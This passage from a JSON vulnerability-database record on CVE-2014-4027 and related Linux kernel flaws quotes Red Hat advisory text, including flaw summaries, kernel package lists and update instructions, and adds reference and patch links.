found in the RAM Disks Memory Copy (rd_mcp)\nback end driver of the iSCSI Target subsystem could allow a privileged user\nto leak the contents of kernel memory to an iSCSI initiator remote client. \n(CVE-2014-4652, Low)\n\n4. Solution:\n\nRed Hat would like to thank Frey Alfredsson for reporting CVE-2014-3631,\nand Vasily Averin of Parallels for reporting CVE-2014-5045. The\nCVE-2014-3673 was discovered by Liu Wei of Red Hat. \n\nAll kernel users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues. The system must be\nrebooted for this update to take effect. \n\nBefore applying this update, make sure all previously released errata\nrelevant to your system have been applied. \n\nThis update is available via the Red Hat Network. Details on how to use the\nRed Hat Network to apply this update are available at\nhttps://access.redhat.com/articles/11258\n\nTo install kernel packages manually, use \"rpm -ivh [package]\". Do not use\n\"rpm -Uvh\" as that will remove the running kernel binaries from your\nsystem. You may use \"rpm -e\" to remove old kernels after determining that\nthe new kernel functions properly on your system. \n\n5. Bugs fixed (https://bugzilla.redhat.com/):\n\n1028148 - CVE-2013-2929 kernel: exec/ptrace: get_dumpable() incorrect tests\n1108744 - CVE-2014-4027 Kernel: target/rd: imformation leakage\n1109774 - CVE-2014-1739 Kernel: drivers: media: an information leakage\n1113406 - CVE-2014-4652 Kernel: ALSA: control: protect user controls against races \u0026 memory disclosure\n1113445 - CVE-2014-4654 CVE-2014-4655 Kernel: ALSA: control: use-after-free in replacing user controls\n1113470 - CVE-2014-4656 Kernel: ALSA: control: integer overflow in id.index \u0026 id.numid\n1122472 - CVE-2014-5045 kernel: vfs: refcount issues during unmount on symlink\n1140325 - CVE-2014-3631 kernel: keys: incorrect termination condition in assoc array garbage collection\n1141173 - CVE-2014-3181 Kernel: HID: OOB write in magicmouse driver\n1141210 - CVE-2014-3182 Kernel: HID: logitech-dj OOB array access\n1141391 - CVE-2014-3184 Kernel: HID: off by one error in various _report_fixup routines\n1141400 - CVE-2014-3185 Kernel: USB serial: memory corruption flaw\n1141407 - CVE-2014-3186 Kernel: HID: memory corruption via OOB write\n1141809 - CVE-2014-6410 kernel: udf: Avoid infinite loop when processing indirect ICBs\n1147850 - CVE-2014-3673 kernel: sctp: skb_over_panic when receiving malformed ASCONF chunks\n1155731 - CVE-2014-3687 kernel: net: sctp: fix panic on duplicate ASCONF chunks\n1155745 - CVE-2014-3688 kernel: net: sctp: remote memory pressure from excessive queueing\n\n6. Package List:\n\nRed Hat Enterprise Linux Client (v. 7):\n\nSource:\nkernel-3.10.0-123.13.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-headers-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm\nperf-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Client Optional (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-123.13.1.el7.noarch.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode (v. 7):\n\nSource:\nkernel-3.10.0-123.13.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-headers-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm\nperf-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux ComputeNode Optional (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-123.13.1.el7.noarch.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server (v. 7):\n\nSource:\nkernel-3.10.0-123.13.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm\n\nppc64:\nkernel-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-bootwrapper-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debug-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debug-devel-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-devel-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-headers-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-tools-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-tools-libs-3.10.0-123.13.1.el7.ppc64.rpm\nperf-3.10.0-123.13.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\n\ns390x:\nkernel-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debug-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debug-devel-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm\nkernel-devel-3.10.0-123.13.1.el7.s390x.rpm\nkernel-headers-3.10.0-123.13.1.el7.s390x.rpm\nkernel-kdump-3.10.0-123.13.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\nkernel-kdump-devel-3.10.0-123.13.1.el7.s390x.rpm\nperf-3.10.0-123.13.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\n\nx86_64:\nkernel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-headers-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm\nperf-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Server Optional (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-123.13.1.el7.noarch.rpm\n\nppc64:\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-debuginfo-common-ppc64-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\nkernel-tools-libs-devel-3.10.0-123.13.1.el7.ppc64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\npython-perf-3.10.0-123.13.1.el7.ppc64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.ppc64.rpm\n\ns390x:\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\nkernel-debuginfo-common-s390x-3.10.0-123.13.1.el7.s390x.rpm\nkernel-kdump-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\npython-perf-3.10.0-123.13.1.el7.s390x.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.s390x.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation (v. 7):\n\nSource:\nkernel-3.10.0-123.13.1.el7.src.rpm\n\nnoarch:\nkernel-abi-whitelists-3.10.0-123.13.1.el7.noarch.rpm\n\nx86_64:\nkernel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debug-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-devel-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-headers-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-3.10.0-123.13.1.el7.x86_64.rpm\nperf-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nRed Hat Enterprise Linux Workstation Optional (v. 7):\n\nnoarch:\nkernel-doc-3.10.0-123.13.1.el7.noarch.rpm\n\nx86_64:\nkernel-debug-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-debuginfo-common-x86_64-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\nkernel-tools-libs-devel-3.10.0-123.13.1.el7.x86_64.rpm\nperf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-3.10.0-123.13.1.el7.x86_64.rpm\npython-perf-debuginfo-3.10.0-123.13.1.el7.x86_64.rpm\n\nThese packages are GPG signed by Red Hat for security.  Our key and\ndetails on how to verify the signature are available from\nhttps://access.redhat.com/security/team/key/\n\n7. References:\n\nhttps://access.redhat.com/security/cve/CVE-2013-2929\nhttps://access.redhat.com/security/cve/CVE-2014-1739\nhttps://access.redhat.com/security/cve/CVE-2014-3181\nhttps://access.redhat.com/security/cve/CVE-2014-3182\nhttps://access.redhat.com/security/cve/CVE-2014-3184\nhttps://access.redhat.com/security/cve/CVE-2014-3185\nhttps://access.redhat.com/security/cve/CVE-2014-3186\nhttps://access.redhat.com/security/cve/CVE-2014-3631\nhttps://access.redhat.com/security/cve/CVE-2014-3673\nhttps://access.redhat.com/security/cve/CVE-2014-3687\nhttps://access.redhat.com/security/cve/CVE-2014-3688\nhttps://access.redhat.com/security/cve/CVE-2014-4027\nhttps://access.redhat.com/security/cve/CVE-2014-4652\nhttps://access.redhat.com/security/cve/CVE-2014-4654\nhttps://access.redhat.com/security/cve/CVE-2014-4655\nhttps://access.redhat.com/security/cve/CVE-2014-4656\nhttps://access.redhat.com/security/cve/CVE-2014-5045\nhttps://access.redhat.com/security/cve/CVE-2014-6410\nhttps://access.redhat.com/security/updates/classification/#important\n\n8. Contact:\n\nThe Red Hat security contact is \u003csecalert@redhat.com\u003e. More contact\ndetails at https://access.redhat.com/security/team/contact/\n\nCopyright 2014 Red Hat, Inc. \n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1\n\niD8DBQFUh2CJXlSAg2UNWIIRArzSAJ95AhqaUI998VyNBJGQaTXfSHeJuQCdFjTp\n6IsJOT0XYi+TiyneMDOm9f4=\n=a0Ai\n-----END PGP SIGNATURE-----\n\n\n--\nRHSA-announce mailing list\nRHSA-announce@redhat.com\nhttps://www.redhat.com/mailman/listinfo/rhsa-announce\n. Relevant releases/architectures:\n\nMRG Realtime for RHEL 6 Server v.2 - noarch, x86_64\n\n3. (CVE-2014-3153, Important)\n\n* It was found that the Linux kernel\u0027s ptrace subsystem allowed a traced\nprocess\u0027 instruction pointer to be set to a non-canonical memory address\nwithout forcing the non-sysret code path when returning to user space. (CVE-2014-4699,\nImportant)\n\nNote: The CVE-2014-4699 issue only affected systems using an Intel CPU. \n\n* It was found that the permission checks performed by the Linux kernel\nwhen a netlink message was received were not sufficient. (CVE-2014-0181, Moderate)\n\n* It was found that the aio_read_events_ring() function of the Linux\nkernel\u0027s Asynchronous I/O (AIO) subsystem did not properly sanitize the AIO\nring head received from user space. (CVE-2014-0206, Moderate)\n\n* An out-of-bounds memory access flaw was found in the Netlink Attribute\nextension of the Berkeley Packet Filter (BPF) interpreter functionality in\nthe Linux kernel\u0027s networking implementation. Google acknowledges Pinkie Pie as the original\nreporter of CVE-2014-3153. Bugs fixed (https://bugzilla.redhat.com/):\n\n1094265 - CVE-2014-0181 kernel: net: insufficient permision checks of netlink messages\n1094602 - CVE-2014-0206 kernel: aio: insufficient sanitization of head in aio_read_events_ring()\n1096775 - CVE-2014-3144 CVE-2014-3145 Kernel: filter: prevent nla extensions to peek beyond the end of the message\n1102571 - CVE-2014-3917 kernel: DoS with syscall auditing\n1103626 - CVE-2014-3153 kernel: futex: pi futexes requeue issue\n1104097 - CVE-2014-3940 Kernel: missing check during hugepage migration\n1108744 - CVE-2014-4027 Kernel: target/rd: imformation leakage\n1113967 - CVE-2014-4667 kernel: sctp: sk_ack_backlog wrap-around problem\n1115927 - CVE-2014-4699 kernel: x86_64: ptrace: sysret to non-canonical address\n\n6",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "db": "PACKETSTORM",
        "id": "128090"
      },
      {
        "db": "PACKETSTORM",
        "id": "127788"
      },
      {
        "db": "PACKETSTORM",
        "id": "128089"
      },
      {
        "db": "PACKETSTORM",
        "id": "127515"
      },
      {
        "db": "PACKETSTORM",
        "id": "129430"
      },
      {
        "db": "PACKETSTORM",
        "id": "127555"
      },
      {
        "db": "PACKETSTORM",
        "id": "128091"
      }
    ],
    "trust": 2.34
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2014-4027",
        "trust": 3.2
      },
      {
        "db": "OPENWALL",
        "id": "OSS-SECURITY/2014/06/11/1",
        "trust": 1.7
      },
      {
        "db": "SECUNIA",
        "id": "60564",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "59777",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "61310",
        "trust": 1.1
      },
      {
        "db": "SECUNIA",
        "id": "59134",
        "trust": 1.1
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527",
        "trust": 0.7
      },
      {
        "db": "BID",
        "id": "68159",
        "trust": 0.1
      },
      {
        "db": "VULHUB",
        "id": "VHN-71967",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128090",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127788",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128089",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127515",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "129430",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "127555",
        "trust": 0.1
      },
      {
        "db": "PACKETSTORM",
        "id": "128091",
        "trust": 0.1
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "PACKETSTORM",
        "id": "128090"
      },
      {
        "db": "PACKETSTORM",
        "id": "127788"
      },
      {
        "db": "PACKETSTORM",
        "id": "128089"
      },
      {
        "db": "PACKETSTORM",
        "id": "127515"
      },
      {
        "db": "PACKETSTORM",
        "id": "129430"
      },
      {
        "db": "PACKETSTORM",
        "id": "127555"
      },
      {
        "db": "PACKETSTORM",
        "id": "128091"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-201406-527"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "id": "VAR-201406-0230",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      }
    ],
    "trust": 0.01
  },
  "last_update_date": "2024-07-23T21:56:56.921000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "target/rd: Refactor rd_build_device_space + rd_release_device_space",
        "trust": 0.8,
        "url": "https://github.com/torvalds/linux/commit/4442dc8a92b8f9ad8ee9e7f8438f4c04c03a22dc"
      },
      {
        "title": "[PATCH] target: Explicitly clear ramdisk_mcp backend pages",
        "trust": 0.8,
        "url": "http://permalink.gmane.org/gmane.linux.scsi.target.devel/6618"
      },
      {
        "title": "Linux Kernel Archives",
        "trust": 0.8,
        "url": "http://www.kernel.org"
      },
      {
        "title": "target/rd: Refactor rd_build_device_space + rd_release_device_space",
        "trust": 0.8,
        "url": "http://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=4442dc8a92b8f9ad8ee9e7f8438f4c04c03a22dc"
      },
      {
        "title": "Bug 1108744",
        "trust": 0.8,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1108744"
      },
      {
        "title": "sol15685: Linux kernel vulnerabilities CVE-2014-3940 and CVE-2014-4027",
        "trust": 0.8,
        "url": "https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15685.html"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-200",
        "trust": 1.1
      },
      {
        "problemtype": "CWE-264",
        "trust": 0.9
      }
    ],
    "sources": [
      {
        "db": "VULHUB",
        "id": "VHN-71967"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2014-003017"
      },
      {
        "db": "NVD",
        "id": "CVE-2014-4027"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.7,
        "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1108744"
      },
      {
        "trust": 1.7,
        "url": "https://github.com/torvalds/linux/commit/4442dc8a92b8f9ad8ee9e7f8438f4c04c03a22dc"
      },
      {
        "trust": 1.7,
        "url": "http://www.openwall.com/lists/oss-security/2014/06/11/1"
      },
      {
        "trust": 1.7,
        "url": "http://permalink.gmane.org/gmane.linux.scsi.target.devel/6618"
      },
      {
        "trust": 1.2,
        "url": "http://www.ubuntu.com/usn/usn-2335-1"
      },
      {
        "trust": 1.1,
        "url": "https://support.f5.com/kb/en-us/solutions/public/15000/600/sol15685.html"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/59134"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/59777"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/60564"
      },
      {
        "trust": 1.1,
        "url": "http://secunia.com/advisories/61310"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00006.html"
      },
      {
        "trust": 1.1,
        "url": "http://lists.opensuse.org/opensuse-security-announce/2014-10/msg00007.html"
      },
      {
        "trust": 1.1,
        "url": "http://www.ubuntu.com/usn/usn-2334-1"
      },
      {
        "trust": 1.0,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git%3ba=commit%3bh=4442dc8a92b8f9ad8ee9e7f8438f4c04c03a22dc"
      },
      {
        "trust": 0.9,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4027"
      },
      {
        "trust": 0.8,
        "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2014-4027"
      },
      {
        "trust": 0.7,
        "url": "http://git.kernel.org/?p=linux/kernel/git/torvalds/linux-2.6.git;a=commit;h=4442dc8a92b8f9ad8ee9e7f8438f4c04c03a22dc"
      },
      {
        "trust": 0.7,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4027"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4655"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4656"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4652"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4654"
      },
      {
        "trust": 0.5,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4667"
      },
      {
        "trust": 0.4,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4653"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4171"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0206"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0181"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4014"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5045"
      },
      {
        "trust": 0.3,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3917"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0155"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4508"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4608"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-0131"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4699"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-4943"
      },
      {
        "trust": 0.2,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-1739"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/updates/classification/#important"
      },
      {
        "trust": 0.2,
        "url": "https://access.redhat.com/security/team/contact/"
      },
      {
        "trust": 0.2,
        "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce"
      },
      {
        "trust": 0.2,
        "url": "https://bugzilla.redhat.com/):"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2336-1"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-trusty/3.13.0-35.62~precise1"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-4514"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4943"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4655"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4653"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-4514"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4654"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4608"
      },
      {
        "trust": 0.1,
        "url": "http://www.mandriva.com/en/support/security/advisories/"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4652"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4699"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-0131"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4656"
      },
      {
        "trust": 0.1,
        "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2014-4667"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-ti-omap4/3.2.0-1452.72"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-5077"
      },
      {
        "trust": 0.1,
        "url": "https://launchpad.net/ubuntu/+source/linux-lts-quantal/3.5.0-54.81~precise1"
      },
      {
        "trust": 0.1,
        "url": "http://www.ubuntu.com/usn/usn-2285-1"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-1739"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3181"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2013-2929"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3673"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3184"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-4027"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-4652"
      },
      {
        "trust": 0.1,
        "url": "https://access.redhat.com/security/cve/cve-2014-3688"
      },
      {
        "trust": 0.1,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2014-3688"
      },
      {
        "trust": 0.1,
